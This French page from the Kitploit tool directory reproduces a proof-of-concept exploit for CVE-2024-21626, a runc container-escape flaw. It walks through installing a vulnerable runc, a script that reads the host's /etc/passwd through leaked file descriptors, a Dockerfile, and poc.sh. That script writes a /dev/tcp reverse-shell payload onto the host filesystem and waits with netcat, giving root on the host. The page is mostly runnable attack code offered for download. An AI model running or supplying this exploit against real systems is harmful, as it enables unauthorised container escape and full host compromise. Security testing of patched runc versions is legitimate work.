Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-21626 — POC | Kitploit
Outils/GitHubGitHub/kubernetesbachelor/cve-2024-21626
Escalade de PrivilègesSécurité des ConteneursAnalyse des VulnérabilitésExploitationRed TeamingÉvasion de Conteneur
GitHubkubernetesbachelor/cve-2024-21626

CVE-2024-21626

POC

Voir le dépôt
25il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2024-21626

POC

Prérequis

runc 1.1.0 <= 1.1.11

Installation de l'environnement vulnérable

Déployez une VM avec Ubuntu 20.04 et téléchargez Docker en suivant leur guide

root@kitploit:~
https://docs.docker.com/engine/install/ubuntu/

Remplacez la version corrigée de 'runc' dans Docker par une version vulnérable

Téléchargez une version vulnérable (runc 1.1.11 ou antérieure) depuis le dépôt GitHub de runc : https://github.com/opencontainers/runc/releases
Choisissez runc.amd64 (requis) runc_1111

Exécution de l'exploit

Exécutez le script 'verify.sh'

root@kitploit:~
#! /bin/bash
for i in {4..20}; do
	docker run -it --rm -w /proc/self/fd/$i ubuntu:20.04 bash -c "cat
/proc/self/cwd/../../../etc/passwd"
done

verify

Modifiez le répertoire de travail dans le Dockerfile avec le bon fd trouvé en exécutant verify.sh

root@kitploit:~
FROM ubuntu:20.04
RUN apt-get update -y && apt-get install netcat -y
ADD ./poc.sh /poc.sh
WORKDIR /proc/self/fd/9

Construisez un conteneur

root@kitploit:~
docker build . -t name_of_container

poc.sh

root@kitploit:~
#!/bin/bash
ip=$(hostname -I | awk '{print $1}')
port=1337
cat > /proc/self/cwd/../../../bin/bash.copy << EOF
#!/bin/bash
bash -i >& /dev/tcp/$ip/$port 0>&1
EOF

# listen and wait for reverse shell
nc -lvvp 1337

Exécutez l'image du conteneur et lancez poc.sh dans un shell bash

root@kitploit:~
docker run -it --rm cve2024 bash /poc.sh

Le conteneur passe en mode écoute

lytte

Un nouveau script a été créé à la racine de la machine hôte nommé 'bash.copy' dans le répertoire /proc/self/cwd/../../../bin/

bash

En rendant le script exécutable et en l'exécutant...

root@kitploit:~
chmod +x bash.copy
./bash.copy

... vous obtiendrez un shell inversé avec les privilèges root sur la machine hôte

root

Source

https://ethicalhacking.uk/cracking-containers-understanding-cve-2024-21626-in-runc/#gsc.tab=0

Télécharger l’outil